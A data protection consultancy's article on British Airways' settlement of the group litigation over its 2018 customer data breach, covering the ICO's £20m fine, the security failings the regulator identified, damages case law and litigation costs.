British Airways has settled the group litigation action brought against it in connection with the 2018 data breach which saw details of 429,612 customers, including credit card details, hacked in a criminal attack. This brings to a conclusion the various legal and regulatory proceeding that arose following the incident.

British Airways had been the subject of a hack between 22 June and 5 September 2018, using the compromised credentials of a supplier’s employee on a Citrix remote access gateway made available for remote working. Once the attacker had gained access to BA’s network, the hacker edited the javascript on BA’s website, which enabled them to exfiltrate customer credit card data during the booking process to another website controlled by the hacker without disrupting the BA payment process. BA estimated that 429,612 data subjects were affected to varying degrees by the data breach.

British Airways has already been subjected to a penalty notice issued by the Information Commissioner’s Office under s155 Data Protection Act 2018 in October 2020 in the sum of £20 million. BA had denied liability, as the victim of criminal activity, but the ICO nevertheless determined that BA had been negligent in its failure to comply with its legal obligations under Article 5(1)(f) and Article 32 GDPR to take appropriate technical and organisational measures to secure data, having regard to factors including:

·       the absence of a requirement for multi-factor authentication to gain access to the Citrix network (or other security, such as a VPN, IP whitelisting etc);

·       the ability of the attacker to ‘break out’ of the Citrix environment to access the wider BA network, despite this being a known risk, and the lack of a risk assessment and implementation of any mitigations in relation to this prospect;

·       the hacker’s ability to access a file which stored the username and password for a privileged user in unencrypted plain text (something the ICO rejected as being standard or acceptable for time saving purposes) granting domain administration rights;

·       the hacker’s ability to subsequently ascertain a system administrator username and password;

·       the accidental storage and retention of log files for the preceding 95 days containing customer payment data in plain text since December 2015, contrary to the Payment Card Industry Data Security Standard (‘PCI DSS’), revealing approximately 108,000 card details to the attacker;

·       the absence of any measures to detect unauthorized changes to BA’s website code; and,

·       BA’s inadequate penetration testing regime.

The ICO noted that the failure to implement multi-factor authentication, for example, was contrary to guidance issued by the National Cyber Security Centre, including in its supply chain security guidance, and the Commissioner’s own guidance on ‘GDPR Security Outcomes’.

The ICO considered that it was likely that many of the affected individuals “will, depending on their circumstances, have suffered anxiety and distress”, regardless of the measures credit card companies take to protect customers from fraud, the fact some customers did not have the CVV number of their payment card compromised (321,000 customers had their card number and CVV compromised), BA’s commitment to reimburse any financial losses and BA’s offer of free credit monitoring which was taken up by just 40,000 customers. The ICO chose not to comment on BA’s submission that "claimant law firms will, for entirely self-serving purposes, use the word ‘distress’ very liberally, essentially with the aim of garnering thousands of potential claimants on no win-no-fee agreement... "

The ICO, acting in its role as the lead supervisory authority under the GDPR, had originally publicised its issuance of a Notice of Intent in July 2019, indicating an intention to fine BA some £183,390,000 – a sum 900% greater than that ultimately issued. In our consultants’ experience, it is not uncommon to see the ICO significantly reduce the sum of a proposed fine between the Notice of Intent and the issue of the Penalty Notice, and the regulated entity has the opportunity to make submissions on the Notice of Intent which can support this. In this case, the ICO was also forced to concede that on public and EU law principles it was not entitled to rely on its then unpublished ‘Draft Internal Procedure for Setting and Issuing Monetary Penalties’. The ICO’s consultation on its draft ‘Statutory guidance on our regulatory action’ closed in November 2020.

In finalising the value of the fine, and having regard to its Regulatory Action Policy, the ICO took into account BA’s prompt notification to the ICO and co-operation with its investigation into account, and determined that a penalty of £30m would be appropriate, before adjustment. No adjustment was made for deterrent effect or due to aggravating factors, and it is notable that despite being the victim of criminal activity BA was not given credit for this on account of the deficiencies in the security of its systems and architecture. The ICO did apply a number of mitigating factors, including the impact of adverse publicity in relation to the breach itself and threatened regulatory action, the measures taken by BA to inform and mitigate the damage to affected data subjects - including its offer to reimburse customers and offer of free credit monitoring, BA’s co-operation with other regulatory bodies, and the remedial security measures it had implemented (albeit not the costs of these). These were considered to warrant a 20% discount on the fine, reducing it to £24m. The ICO declined to compare the level of proposed fine with that issued by other supervisory authorities across Europe in the context of other breaches. Ability to pay is also a relevant factor which can serve to mitigate the value of a fine. As a consequence of the COVID pandemic, BA argued that the fine should be significantly reduced or extinguished. The ICO accepted a further reduction of £4m, bringing the fine to £20m. In circumstances where BA’s turnover for the relevant period was £12.26bn, the fine imposed amounted to approximately 0.16% of annual turnover, compared to a possible maximum of 4%.

In the context of considering the factor under Article 83(2)(g) GDPR relating to the categories of personal data affected by the breach, the ICO relied upon the paper issued by ENISA, the European Union Agency for Network and Information Security, and prepared by ENISA and the Greek and German data protection authorities in 2013 entitled ‘Recommendations for a methodology of the assessment of severity of personal data breaches’. This provides a formula for calculating breach severity, and recommended that the disclosure of full financial data that could enable fraud or a detailed social/financial profile to be created be treated as being of the maximum severity, the same category as sensitive/special category data.

The terms of the settlement of the ‘British Airways Data Event Group Litigation’ in the case of Weaver and others v British Airways plc are currently confidential, although we might expect them to be reflected in BA’s financial statements in due course. As such, we don’t yet know how much money has been awarded and how it will be split between Claimants and their legal representatives. As at 31 December 2020, BA had made legal claims provisions in the sum of £32m. BA did not accept liability as part of the settlement.

As of 1 February 2021, a total of 22,230 clients had signed up with the lead claimant solicitors and approximately another 1,000 had signed up with other claimant firms, amounting to fewer than 5% of affected data subjects, although the claimant solicitor firms anticipated a further 20,000 claimants signing up by the March 2021 cut off date, reflecting approximately 8%. This would result in a roughly equivalent figure to the number of data subjects who signed up to BA’s offer of free credit monitoring.

Following the incident, when law firms were advertising for potential claimants, one of the claimant firms indicated that it anticipated that individuals could be awarded up to £2,000 each whereas another was reported in The Sun as believing up to £6,000 could be available. Earlier this year, one claimant firm suggested that the claims could cost BA up to £2.4 billion, to which BA responded that “We do not recognise the damages figures that Your Lawyers has put forward, and they have not appeared in the claims”.

The Court of Appeal has previously held (under the Data Protection Act 1998) that the nominal sum of £1 should be awarded for damage in addition to £750 for distress in circumstances where inaccurate personal data had been shared with a credit reference agency. Taking the approach in TLT and others, again under the Data Protection Act 1998, an award of £1,250 would be equivalent to sustaining “less severe” psychiatric damage in personal injury. Since the TLT decision, the General Data Protection Regulation (‘GDPR’) and the Data Protection Act 2018 have come into force and the Court of Appeal has confirmed, in Lloyd v Google (another case under the 1998 Act), that damages can be awarded for loss of control of personal data even in the absence of any mental distress, although the Supreme Court’s judgment on Google’s appeal against this decision is awaited. Nevertheless, an expectation of even £2,000 per data subject in the absence of any actual financial loss continues to appear ambitious.

While even relatively small sums awarded to large numbers of data subjects can soon mount up, it is the legal costs associated with claims that often presents the biggest risk.

The common costs of the group litigation, that is to say the costs of dealing with group litigation order issues, costs of individual test claims and costs incurred by the lead legal representative in administering the group litigation, were budgeted to amount to millions of pounds for both the Claimants and Defendant. In addition to the common costs, there are individual costs in relation to each claim. The Claimants initially sought approximately £1,200 per case, although by the time of the costs budgeting hearing, these had been reduced to £624 per case. In relation to an anticipated 43,230 claimants, however, that would still amount to almost £27m in addition to the common costs and compensation itself. By reaching a settlement, BA will have significantly reduced its costs exposure.

Some succour for BA and other defendants came from the confirmation that claimant firms would not be entitled to recover the advertising fees associated with recruiting potential claimants, and that these were properly to be considered general overheads of the claimant firms rather than costs attributable to the litigation. The firms had sought to recover a sum of £443,000 already incurred and a further £557,000 intended to be spent on future advertising.

Even anticipating that the settlement will fall within BA’s provisions, taking into account the ICO’s fine, BA’s own legal costs, the costs of settlement, and the costs of managing and remediating the breach itself, including IT and PR costs, the breach is likely to have cost BA in excess of £50m.

Should you require assistance in reviewing your organisation’s data protection compliance, preparing for how your organisation should respond to a data breach, in managing a data breach, or liaising with regulators in the context of data protection enforcement action, please contact us: info@handleygill.com.